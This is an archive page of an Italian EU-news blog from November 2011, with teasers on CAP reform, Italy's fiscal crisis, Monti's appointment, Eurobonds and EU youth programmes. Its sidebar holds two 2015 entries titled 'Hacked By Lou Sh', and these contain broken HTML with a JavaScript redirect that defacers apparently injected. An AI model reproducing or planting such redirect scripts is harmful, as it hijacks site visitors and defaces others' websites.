EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Novembre 2011
it

La nuova Pac permetterà di promuovere l’innovazione, di rafforzare la competitività, di far fronte ai cambiamenti climatici, di sostenere l’occupazione e la crescita. Inoltre vuole garantire l’approvvigionamento alimentare e lo sviluppo sostenibile delle aree rurali. Uno dei tanti vantaggi sarà poi, quello di aiutare gli agricoltori ad adattarsi alle nuove esigenze del mercato.

La Politica Agricola Comune, più delle altre, ha dovuto, nel corso degli anni, adattarsi e rinnovarsi continuamente per poter far fronte ai continui interventi economici, nazionali e internazionali. Questo non ha però fatto perdere di vista gli scopi essenziali per una politica Agricola: (...)

it

La Commissione europea ha chiesto formalmente, per la seconda volta, di attuare le norme comunitarie circa l’imposta sul valore aggiunto. Tempo due mesi, o ci sarà il ricorso alla Corte di giustizia europea.

Quanto è un peso l’Italia per l’Europa? In questi giorni ci si rende sempre più conto che la terza economia più forte del continente, in realtà agli occhi dei cugini membri è solamente una zavorra. Un peso si, quasi un ostacolo nelle dinamiche comunitarie. Servono credibilità e pugno di ferro, ma le (...)

it

Cinque rappresentanti del popolo arabo si sono aggiudicati quest’anno il premio Sakhrov. Il riconoscimento viene assegnato ogni anno a coloro che spendono la loro vita e le loro energie nella difesa dei diritti umani.

Il primo a ricevere il Premio Sakharov fu, nel lontano 1988, Nelson Mandela. Conoscenza di tutti la vita del presidente Sud Africano dedicata tutta alla lotta all’apartheid, gli anni nel carcere che non hanno fermato le sue verità, una vita offerta al riconoscimento dei diritti degli uomini, (...)

it

Sono aperte le iscrizioni per la decima edizione del Master che vi permetterà di diventare i futuri dirigenti e professionisti nel mercato della comunicazione e dei media

Vi segnaliamo l’apertura delle iscrizioni per il Master che vi permetterà di diventare i futuri dirigenti e professionisti nel mercato della comunicazione e dei media. Stiamo parlando del “ Master in Economia e Gestione della Comunicazione e dei Media ”, giunto oramai alla sua decima edizione, (...)

it

Da Bruxelles la richiesta agli Stati membri di un maggiore intervento per combattere un fenomeno in forte crescita, attraverso la rimozione e il blocco dell’accesso ai siti. Pene più severe anche per gli adescatori telematici e i turisti sessuali.

La stretta finale imposta dall’Ue contro la pedopornografia via web ha preso vita dopo l’approvazione da parte del Parlamento di nuove regole decisamente più severe. La direttiva contro gli abusi sui minori, approvata a Bruxelles e in precedenza concordata dagli eurodeputati e dai ministri degli (...)

it

Lo scorso 12 ottobre, il commissario europeo all’allargamento, Stefan Fule, ha presentato una rosea prospettiva di adesione all’Ue degli otto paesi candidati, tra i quali i cinque della regione balcanica: Serbia, Croazia, Montenegro, Albania e Bosnia. Luci ed ombre sugli ex paesi sovietici, molta strada è stata fatta verso il matrimonio comunitario, ma sono ancora moltissime le preoccupazioni di Bruxelles, a partire dall’instabilità delle riforme democratiche e dai mai sopiti contrasti interni tra le diverse comunità.

Nonostante non goda di buona salute, per usare un lapalissiano eufemismo, l’Europa vuole allargarsi. E a chi è rivolto l’allargamento? A diversi paesi che soffrono già di gravi problemi interni. Pertanto le faglie del sistema euro, che già con la crisi economica si sono trasformate in voragini, con (...)

10
11
2011

Let’s Go Spain!

it

Dopo il successo dei primi due convegni di ottobre, che hanno riguardato la Germania, lo Spazio Incontragiovani Europa dà di nuovo appuntamento a voi ragazzi nei giorni 17 e 24 novembre. Se siete interessati a vivere per un periodo in Spagna e cercate informazioni su dove studiare, lavorare o siete alla ricerca dello stage in lingua spagnola che avete sempre sognato, non mancate gli ultimi due giovedì di questo mese a Roma, in Via Savoia 15, dalle ore 17 alle ore 19.

La mobilità giovanile in Europa sta diventando un argomento sempre più centrale nell’attualità del nostro Paese. Che si tratti di scambi interculturali, periodi dedicati allo studio e all’approfondimento di una lingua comunitaria, che riguardi il prendere parte ad un internship o la ricerca di (...)

it

“Analizzando i risultati dei test giunti fin’ora - dice il portavoce dell’assoziazione – denunciamo un’ analisi incompleta dei rischi e una preoccupante approssimazione dei dati ”.

Dopo il disastro nucleare di Fukushima, l’Unione Europea aveva chiesto ai paesi membri di effettuare una serie di test, i cui risultati avrebbero dovuto essere pubblicati entro il 31 ottobre circa la capacità delle centrali di resistere ad attacchi aerei, terremoti, sabotaggi, inondazioni e (...)

it

Il commissario europeo ammette di essere preoccupato per l’economia italiana. L’Unione europea chiede ulteriori provvedimenti, non è esclusa un’altra manovra; le riforme strutturali (lavoro, pensioni, sistema fiscale) potrebbero essere arrivate oltre il tempo massimo. Nel frattempo arrivano i funzionari europei per verificare l’attuazione delle misure promesse.

Olli Rehn, il commissario europeo per gli Affari economici e monetari, ha dedicato parte della conferenza stampa tenutasi al termine dell’Ecofin (Consiglio Economia e finanza) dello scorso 8 novembre alla situazione economica italiana. Il politico finlandese ha espresso serie perplessità riguardo (...)

it

Dopo il successo delle scorse due edizioni, torna a far parlare di sé il “Write-aids”, il celebre premio giornalistico nazionale, nato per combattere la forte indifferenza mostrata nei confronti di una delle malattie più gravi che, purtroppo, ancora oggi appare priva di spiegazioni plausibili.

Per l’edizione 2011 il concorso propone due temi fondamentali che vengono proposti alla società al fine di sensibilizzare l’attenzione di chiunque mostri interesse verso quello che oggi può essere definito come uno dei più grandi tabù nati dall’inconsapevolezza con la quale si effettuano le scelte (...)

it

Oli Rehn, vicepresidente della commissione e responsabile degli Affari economici e monetari, è chiaro a margine dell’ufficialità delle previsioni: "La crescita è ferma in Europa: siamo a rischio di una nuova recessione. Benché in alcuni Stati membri si registri un aumento dei posti di lavoro, non si prevede alcun effettivo miglioramento sul versante della disoccupazione nell'insieme dell'UE”.

Nel post di domenica scorsa abbiamo esaminato il pantano in cui l’Italia è e sarà bloccata per i prossimi anni per quanto concerne la situazione economica. Purtroppo anche l’Europa si ritrova in questa situazione deficitaria tanto da allarmare gli addetti ai lavori. Dunque anche se l’Europa intera (...)

it

Il prossimo 30 novembre termina la prima fase di “Generation €uro Students’ Award”: una competizione sulla politica monetaria rivolta a tutti gli studenti delle scuole secondarie superiori e organizzata dalla BCE (Banca centrale europea) e dalle banche centrali nazionali di 11 paesi della zona euro.

Generation €uro Students’ Award nasce come un’opportunità concessa a tutti quei ragazzi cresciuti con l’euro di conoscere meglio la politica monetaria vigente nella zona della moneta unica e comprendere le attività svolte da una banca centrale. La competizione si divide in tre diverse fasi. Nella (...)

it

L’Incontragiovani Marconi organizza due giornate di seminari per spiegare a chi è in cerca di lavoro come utilizzare la nuova piattaforma per la compilazione dei curriculum con formato europeo. In occasione di questi incontri, si cercherà, inoltre, di dare ai futuri candidati le giuste competenze per poter sfruttare al meglio il tempo concesso durante i colloqui di lavoro, imparando a dare rilievo a quelle esperienze che più soddisfino i criteri di ricerca dell’azienda per la quale si intende lavorare.

“Sono in cerca di lavoro. Oggi inizierò scrivendo il mio curriculum. Vediamo… Mi sono laureata da poco, quindi non ho maturato ancora esperienze significative. Nessuno mi offrirà mai un lavoro con un curriculum del genere. E poi, dovrei scrivere un CV in italiano o in inglese? Troppo complicato, (...)

it

Si chiama “Piccole imprese, grande mondo - un nuovo partenariato per aiutare le PMI a cogliere le opportunità globali” la Comunicazione presentata a Bruxelles dalla Commissione Europea, il cui obiettivo è proprio quello di aumentare le opportunità, ancora oggi troppo scarse per la maggior parte delle Piccole e Medie Imprese (PMI) europee, di concorrere sui mercati globali.

“I principali mercati non Europei - come Cina, India, Russia, Sud Est asiatico e America Latina - caratterizzati da tassi di crescita elevati offrono opportunità inesplorate per le PMI, che sono il primo punto di forza dell’economia europea. Aiutarle a sfruttare al meglio il loro potenziale (...)

it

I maggiori leader europei si sono complimentati direttamente con il presidente della Repubblica Giorgio Napolitano per via telefonica; da parte di tutti una rinnovata disponibilità a stringere con l'Italia nuovi rapporti diplomatici.

Il cambio di guardia alla guida del Governo italiano ha inevitabilmente attirato l’attenzione dell’Europa intera. La scelta del presidente della Repubblica Napolitano di affidare l’incarico di formare il nuovo esecutivo a Mario Monti è stata valutata positivamente dai massimi esponenti dell’Unione (...)

it

Approvati a Bruxelles i nuovi finanziamenti che svelano l’intenzione dell’Ue di fare dell’Europa uno spazio per cittadini volenterosi, in grado di contribuire con le loro azioni alla crescita economica.

Sin dalla sua costituzione, l’Ue ha sempre cercato il coinvolgimento dei propri cittadini in attività con le quali costituire dei valori aggiunti per la crescita dell’Europa. È dello scorso 9 novembre l’ultima azione al riguardo in ordine di tempo, con la Commissione europea che ha avuto modo di (...)

it

Per ora disponibile solo in inglese e francese, ma presto lo sarà anche in lingua araba e spagnola, il nuovo portale, varato a Bruxelles lo scorso 18 novembre, offre informazioni utili a chiunque sia interessato a recarsi in un paese europeo. Il sito si rivolge infatti sia a tutti quei cittadini stranieri residenti fuori dall’UE, che ai migranti già presenti sul territorio europeo e che intendono spostarsi in un altro degli Stati membri.

Che sia definitiva o meno, dettata da motivi di studio o di lavoro, la scelta di recarsi in un paese diverso dal proprio non è mai facile. Nuove persone con cui confrontarsi, una nuova cultura da cercare di fare propria, una nuova lingua con cui comunicare. E ancora, la paura di una realtà che (...)

it

Il Club di Venezia, l'organismo informale che riunisce i responsabili della comunicazione istituzionale degli Stati dell'Unione (membri e candidati) e delle istituzioni europee (Commissione, Parlamento e Consiglio) si è riunito per discutere delle innovazioni nel campo della comunicazione moderna e dei nuovi progetti da promuovere nel 2012.

"La comunicazione via web gioca un ruolo fondamentale durante le fasi di crisi mondiale: favorisce l’abbattimento delle barriere tra le persone e la circolazione di idee contribuendo ad un processo di democratizzazione a livello globale". Si è aperta così con le dichiarazioni di Giorgio Orsoni, (...)

it

Kristalina Georgieva, commissario europeo per la cooperazione internazionale, gli aiuti umanitari e la risposta alle crisi, fissa quelli che sono gli obiettivi per il 2012. Qualsiasi intervento dell’uomo deve saper accrescere la propria efficacia ed essere in grado di far fronte alle imminenti calamità naturali o alle crisi politiche internazionali. L’economista bulgara chiarisce come, in vista del rafforzamento del meccanismo di protezione civile, lo scopo non sia quello di anticipare i disastri naturali, ma di adottare adeguate misure preventive.

In una importante intervista rilasciata a EurActiv Italia, Kristalina Georgieva chiarisce i suoi obiettivi per il 2012. Diverse sembrano, infatti, essere le misure da adottare per poter fronteggiare adeguatamente i danni causati da disastri ambientali o da crisi politiche internazionali. (...)

it

Quella che sta per terminare è stata una settimana molto importante per il Belpaese. Mario Monti ha incontrato prima i vertici di Bruxelles, poi i leader della comunità europea con l’obiettivo di riacquistare una fiducia che ormai da troppo tempo non è più attribuibile al terzo paese dell’Unione.

Non sarà facile né uscire dalla stretta dello spread, né riconquistare la fiducia dell’Ue e dei mercati. Di certo l’ex premier non ci ha lasciato in un ottimo stato, e gran parte della credibilità internazionale persa sarebbe da attribuire alle sue scelte politiche e non. Ma sta di fatto che ora non (...)

it

Dopo trentadue anni l'Unione europea modifica le etichette dei generi alimentari; in seguito a tale regolamentazione, sugli scaffali di tutta Europa le confezioni dei prodotti recheranno etichette più chiare ed attente alla salute dei consumatori. Il percorso “a tappe” della normativa si concluderà nel 2014.

Martedì scorso è stato pubblicato sulla Gazzetta Ufficiale dell’Unione europea un regolamento che apporta importanti modifiche alle etichette poste sulle confezioni dei prodotti alimentari. Questo storico cambiamento (le etichette utilizzate fino a pochi giorni fa erano disciplinate da una (...)

it

Dopo giorni di acceso dibattito sugli Eurobond, la Commissione europea rompe il silenzio ed esprime il suo punto di vista per mezzo di un Libro Verde intitolato “Feasibility of introducing Stability bonds”. Gli Eurobond, o Stability bond, come sono stati cautamente rinominati dalla Commissione, sembrano infatti rappresentare una possibile via d’uscita dalla crisi del debito.

Che l’Europa stia attraversando un periodo storico particolarmente delicato è ormai sotto gli occhi di tutti. Complice una crisi economica che sembra davvero intenzionata a non allentare la sua morsa. A dimostrarcelo, quasi quotidianamente, ci sono gli indici delle borse che continuano, salvo (...)

it

Janusz Lewandowski, il commissario europeo al Bilancio, il 19 novembre scorso subito dopo la votazione finale del Parlamento europeo si esprimeva così sul bilancio 2012 dell’UE : "Questo è chiaramente un bilancio di austerità poiché la maggioranza degli Stati membri è nel mezzo di una seria crisi finanziaria". Nonostante i tagli il budget messo a disposizione sarà di 129 miliardi di euro e presenterà un aumento dell’1,85% dei pagamenti.

Nasce dall’esigenza di tagliare le gambe ai debiti dei vari Stati membri ma il bilancio approvato per il 2012 mantiene alte le aspirazioni e le spinte al progresso del’Unione. Bilancio di austerità , come definito da Lewandoski, ma che garantirà "il finanziamento di politiche fondamentali, quali (...)

it

E’ appena giunta al termine la terza edizione della “Settimana per la riduzione dei rifiuti”, svoltasi dal 19 al 27 novembre. L’iniziativa, in linea con il programma Life+, sembra aver raggiunto quest’anno un successo superiore agli anni precedenti. Nata con l’obiettivo di promuovere un maggiore rispetto per l’ambiente, la “settimana” ha dato vita a numerose iniziative realizzate in gran parte dell’Italia e dei Paesi europei. In questa ultima edizione sono state introdotte nuove azioni comuni, ed in modo particolare: la riduzione dei rifiuti cartacei, la riduzione dei rifiuti dovuti ad un eccesso di imballaggi, la riduzione dei rifiuti alimentari, e ripara/riutilizza, nonché veri e propri laboratori di riparazione.

Si è tenuta dal 19 al 27 novembre la terza edizione della settimana dedicata alla riduzione dei rifiuti. Proprio in occasione di questo evento, Porta la Sporta, Italia Nostra e Adiconsum invitano la Grande Distribuzione a incentivare lo smaltimento dei rifiuti adottando diverse iniziative. Sono (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France